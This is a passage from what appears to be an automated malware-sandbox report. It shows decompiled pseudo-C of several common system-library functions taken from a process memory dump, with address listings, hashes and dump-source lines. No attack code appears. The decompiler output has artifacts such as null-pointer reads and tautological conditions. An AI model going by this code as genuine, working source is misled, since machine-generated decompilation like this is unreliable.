						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04A89890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04A5EEF0(0x4b379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04A5EB70(0, 0x4b379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xdc2d4d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04A7F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04A5EEF0(0x4b379a0);
									__eflags =  *0x4b38210 - _t104; // 0xdc2d40
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4b38210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04AC4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04A5EB70(_t95, 0x4b379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04A895D0();
											L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04A895D0();
											L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04A5EB70(_t93, 0x4b379a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04A895D0();
										L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04A895D0();
										L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04A7F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x04a452a5
0x04a452ad
0x04a452b0
0x04a452b3
0x04a452b7
0x04a452ba
0x04a452bf
0x04a452c4
0x04a452cc
0x00000000
0x00000000
0x04a452ce
0x04a452d9
0x04a452dd
0x04a452e7
0x04a452f7
0x04a452f9
0x04a452fd
0x04aa0dcf
0x04aa0dd5
0x04aa0dd6
0x04aa0dd7
0x04aa0dd8
0x04aa0dd9
0x04aa0dde
0x04aa0ddf
0x04aa0de0
0x04aa0de1
0x04aa0de2
0x04aa0de5
0x04aa0dea
0x04aa0dec
0x04aa0f60
0x04aa0f64
0x04aa0f70
0x04aa0f76
0x04aa0f79
0x04aa0f79
0x00000000
0x04aa0f64
0x04aa0df2
0x04aa0df7
0x04aa0e04
0x04aa0e0d
0x04aa0e0d
0x04aa0e10
0x04aa0e1a
0x04aa0e1c
0x04aa0e4c
0x04aa0e52
0x04aa0e61
0x04aa0e67
0x04aa0e6b
0x04aa0e70
0x04aa0e76
0x04aa0ed7
0x04aa0edc
0x04aa0ee0
0x04aa0ee6
0x04aa0eea
0x04aa0eed
0x04aa0ef0
0x04aa0ef3
0x04aa0ef6
0x04aa0ef9
0x04aa0efe
0x04aa0f01
0x04aa0f01
0x04aa0f0b
0x04aa0f12
0x04aa0f16
0x04aa0f18
0x04aa0f1b
0x04aa0f2c
0x04aa0f31
0x04aa0f31
0x04aa0f35
0x04aa0f39
0x04aa0f3a
0x04aa0f3c
0x04aa0f3f
0x04aa0f50
0x04aa0f55
0x04aa0f55
0x04aa0f59
0x04a452eb
0x04a452f1
0x04a452f1
0x04aa0e7d
0x04aa0e84
0x04aa0e88
0x04aa0e8a
0x04aa0e8d
0x04aa0e9e
0x04aa0ea3
0x04aa0ea3
0x04aa0ea7
0x04aa0eaf
0x04aa0eb3
0x04aa0eb9
0x04aa0eb9
0x04aa0ebc
0x04aa0ecd
0x04aa0ecd
0x00000000
0x04aa0eb3
0x04aa0e21
0x04aa0e2b
0x04aa0e2f
0x04aa0e30
0x04aa0e3a
0x04aa0e3f
0x04aa0e41
0x00000000
0x00000000
0x04aa0e47
0x00000000
0x04aa0e47
0x04aa0df9
0x04aa0dfe
0x00000000
0x00000000
0x00000000
0x04aa0dfe
0x04a45303
0x04a45307
0x00000000
0x04a45309
0x00000000
0x04a45309
0x04a45307
0x04a452e9
0x04a452e9
0x00000000
0x04a452e9
0x04a4530e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807a4b0db8de576b102fdb3bd134c3b61bbf818245aadf55c72a487276e6d12e
Instruction ID: b61b1f13c225ad4b25bedc57f9ffe84ca535863d853ed524d044e70af336b4aa
Opcode Fuzzy Hash: 807a4b0db8de576b102fdb3bd134c3b61bbf818245aadf55c72a487276e6d12e
Instruction Fuzzy Hash: 0351D071205342AFE721EF25CA40B2BBBE8FF94718F10491EE59587A60E774F804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04A72AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A72AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4b38204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4b38208; // 0x4b38207
				_t8 = _t57 + 0x4b38208; // 0x4b38207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4b38450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4b3821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4b36d5c; // 0x7f0e0654
							_t72 =  *0x4b36d5c; // 0x7f0e0654
							_t75 =  *0x4b36d5c; // 0x7f0e0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4b36d5c; // 0x7f0e0654
							_t84 =  *0x4b36d5c; // 0x7f0e0654
							_t87 =  *0x4b36d5c; // 0x7f0e0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04A8F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04a72ae4
0x04a72aec
0x04a72aef
0x04a72af4
0x04a72af7
0x04a72afd
0x04a72b92
0x04a72b92
0x04a72b97
0x04a72b9c
0x04a72b9c
0x04a72b03
0x04a72b06
0x04a72b09
0x04a72b09
0x04a72b0f
0x04a72b15
0x04a72b15
0x04a72b1b
0x04a72b1e
0x04a72b21
0x04a72b26
0x04a72b29
0x04a72b81
0x04a72b84
0x04a72c0e
0x04a72c15
0x04a72c24
0x04a72c24
0x04a72b8a
0x04a72b8a
0x04a72b8a
0x04a72b8a
0x04a72b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04a72b4a
0x04a72b4a
0x04a72b4d
0x04a72b53
0x00000000
0x00000000
0x04a72b55
0x04a72b58
0x04a72bb7
0x04ab5d1b
0x04ab5d37
0x04ab5d47
0x04ab5d53
0x04a72bbd
0x04a72bbd
0x04a72bbd
0x04a72bb7
0x04a72b5d
0x04a72c2f
0x04ab5d5b
0x04ab5d77
0x04ab5d87
0x04ab5d93
0x04a72c35
0x04a72c35
0x04a72c35
0x04a72c2f
0x04a72b65
0x04a72b9f
0x04a72ba2
0x04a72b67
0x04a72b67
0x04a72b69
0x04a72b6b
0x04a72b6e
0x04a72bc9
0x04a72bcc
0x04a72bcf
0x04a72bd4
0x04a72bd6
0x04a72bd6
0x04a72bdb
0x04a72c02
0x04a72c05
0x04a72c07
0x00000000
0x04a72c07
0x04a72be0
0x04a72c00
0x04a72c3f
0x04a72c3f
0x00000000
0x04a72c00
0x04a72be5
0x04a72be7
0x04a72bec
0x04a72bf4
0x04a72bf6
0x00000000
0x04a72bf6
0x04a72b70
0x04a72b76
0x04a72b2b
0x04a72b2b
0x04a72b2d
0x04a72b2f
0x04a72b32
0x04a72b35
0x04a72b3a
0x00000000
0x04a72b40
0x04a72b43
0x04a72b45
0x04a72b47
0x04a72b4a
0x04a72b4d
0x04a72b53
0x00000000
0x00000000
0x00000000
0x04a72b53
0x04a72b78
0x04a72b78
0x04a72b7b
0x04a72b7e
0x00000000
0x04a72b7e
0x04a72b76
0x04a72ba5
0x04a72ba5
0x04a72ba8
0x04a72bad
0x00000000
0x00000000
0x04a72baf
0x04a72baf
0x04a72bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3aca052c8e7d5665d9e3c2b9e7d32cea5e7f7bb2ab81de6f1c2163a0409695
Instruction ID: 8c91ee5b5795cbdd1212f1cced24af70b970c798e369cdc847ff7b5df7a2bf3a
Opcode Fuzzy Hash: 6c3aca052c8e7d5665d9e3c2b9e7d32cea5e7f7bb2ab81de6f1c2163a0409695
Instruction Fuzzy Hash: D551AD77B001158F8B28DF19CC90ABDB7B1FBE8701716859AE8469B314E734BA41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B0AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04B0AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04B0C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04B0ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E04B0FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04B0EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04A67D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04B01608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04B11536(0x4b38ae4, (_t74 -  *0x4b38b04 >> 0x14) + (_t74 -  *0x4b38b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L04B0C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E04B0A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04AECB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E04B0ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x04b0ae44
0x04b0ae4c
0x04b0ae53
0x04b0ae55
0x04b0ae5c
0x04b0ae64
0x04b0ae68
0x04b0ae75
0x04b0ae75
0x04b0ae78
0x04b0ae7a
0x04b0ae7c
0x04b0ae7f
0x04b0aea8
0x04b0aeab
0x04b0aead
0x00000000
0x00000000
0x04b0aeb3
0x04b0aeb8
0x04b0aebb
0x04b0aebd
0x00000000
0x04b0ae81
0x04b0ae88
0x04b0ae8f
0x04b0ae9b
0x04b0ae96
0x04b0ae96
0x04b0ae96
0x04b0aea0
0x04b0aea3
0x04b0aebf
0x04b0aebf
0x04b0aec3
0x04b0aec9
0x04b0af0d
0x04b0af14
0x04b0af3d
0x04b0af3d
0x04b0af41
0x04b0af44
0x04b0af67
0x04b0af67
0x04b0af6a
0x04b0afca
0x04b0afd1
0x00000000
0x04b0afd1
0x04b0af6c
0x04b0af6d
0x04b0af75
0x04b0af7c
0x04b0af7e
0x04b0af80
0x04b0af85
0x04b0af87
0x04b0af99
0x04b0af89
0x04b0af92
0x04b0af92
0x04b0af9e
0x04b0afa1
0x04b0afa3
0x04b0afa9
0x04b0afb0
0x04b0afb2
0x04b0afb4
0x04b0afbc
0x04b0afbc
0x04b0afb4
0x04b0afb0
0x00000000
0x04b0afa1
0x04b0af4f
0x04b0af57
0x04b0af5c
0x04b0af5e
0x00000000
0x00000000
0x04b0af60
0x04b0af64
0x04b0af64
0x00000000
0x04b0af64
0x04b0af1a
0x04b0af25
0x00000000
0x00000000
0x04b0af27
0x04b0af28
0x04b0af33
0x00000000
0x04b0aed0
0x04b0aed0
0x04b0aed2
0x04b0aee1
0x04b0aee4
0x00000000
0x00000000
0x04b0aee6
0x04b0aeec
0x00000000
0x00000000
0x04b0aefb
0x04b0af07
0x04b0afd3
0x04b0afdb
0x04b0afdb
0x00000000
0x04b0af07
0x04b0aed6
0x04b0aed8
0x04b0aedf
0x00000000
0x00000000
0x00000000
0x04b0aedf
0x04b0aec9

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b10d88ddd6cb479554fe14b41236f28da518e62ab6e79d4fac8e403b0022e95
Instruction ID: d09f416092bb51e31f01cf602011c0100aaf5669eb5cf820e7a8c40b635c3610
Opcode Fuzzy Hash: 8b10d88ddd6cb479554fe14b41236f28da518e62ab6e79d4fac8e403b0022e95
Instruction Fuzzy Hash: 3541E8717003115BDB25DA25C894B3BBB9AEFA8716F14CE99F816C72D0DB34F801C691

Uniqueness

Uniqueness Score: -1.00%

Function 04A6DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04A6DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04A4CC50(E04A44510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04A67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04B18ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04A62280(_t58, _v44);
						E04A6DD82(_v44, _t102, _t98);
						E04A6B944(_t102, _v5);
						return E04A5FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4b38628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4b3862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4b38628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4b3862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4b0fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x04a6dbe9
0x04a6dbf2
0x04a6dbf7
0x04a6dbf9
0x04a6dbfc
0x04a6dc00
0x04a6dc03
0x04a6dc14
0x04a6dd54
0x04a6dd54
0x04a6dd54
0x04a6dc18
0x04a6dc1d
0x04a6dc1d
0x04a6dc32
0x04a6dc3b
0x04a6dc3e
0x04a6dc46
0x04a6dd5b
0x04a6dd62
0x04a6dd64
0x04a6dd67
0x04a6dd69
0x04a6dd6b
0x04a6dd6e
0x04a6dd70
0x04a6dd73
0x04a6dd73
0x00000000
0x04a6dc4c
0x04a6dc4e
0x04ab3ae3
0x04ab3ae8
0x04ab3aea
0x04a6dce7
0x04a6dce9
0x04a6dcec
0x04a6dcee
0x04a6dcf0
0x04a6dcf3
0x04a6dcf5
0x04ab3af2
0x04ab3af5
0x04ab3af5
0x04a6dd06
0x04a6dd08
0x04a6dd0b
0x04a6dd12
0x04ab3b08
0x04a6dd18
0x04a6dd18
0x04a6dd18
0x04a6dd20
0x04a6dd23
0x04ab3b16
0x04ab3b16
0x04a6dd29
0x04a6dd2d
0x04a6dd36
0x04a6dd40
0x04a6dd51
0x04a6dd51
0x04a6dc54
0x04a6dc59
0x04a6dc59
0x04a6dc5e
0x04a6dc5e
0x04a6dc63
0x04a6dc66
0x04a6dc6b
0x04a6dc78
0x04a6dc7b
0x04a6dc81
0x04a6dc81
0x04a6dc83
0x04a6dc89
0x00000000
0x00000000
0x04a6dd7b
0x04a6dd7b
0x04a6dc8f
0x04a6dc8f
0x04a6dc92
0x04a6dc99
0x04a6dc9f
0x04a6dca5
0x04a6dcaa
0x04a6dcaa
0x04a6dcb3
0x04a6dcb8
0x04a6dcbb
0x04a6dcc1
0x04a6dccf
0x04a6dcd2
0x04a6dcd5
0x04a6dcd7
0x04a6dcda
0x04a6dcdc
0x04a6dcdc
0x04a6dce2
0x04a6dce4
0x00000000
0x04a6dce4

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a6d62ea90f3d5bdcc4e467b10a2524435a93ee6909c8978a4dac501ba4afcd
Instruction ID: bac33200b240aa929880f47afffb23329032296c4beae79bad3633bf0c7fdf23
Opcode Fuzzy Hash: a3a6d62ea90f3d5bdcc4e467b10a2524435a93ee6909c8978a4dac501ba4afcd
Instruction Fuzzy Hash: 8D519C71B01619DFCB14DF68C580AAEBBF5BB88354F20855AD956EB340EB31BD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A5EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04A5EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04A49080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
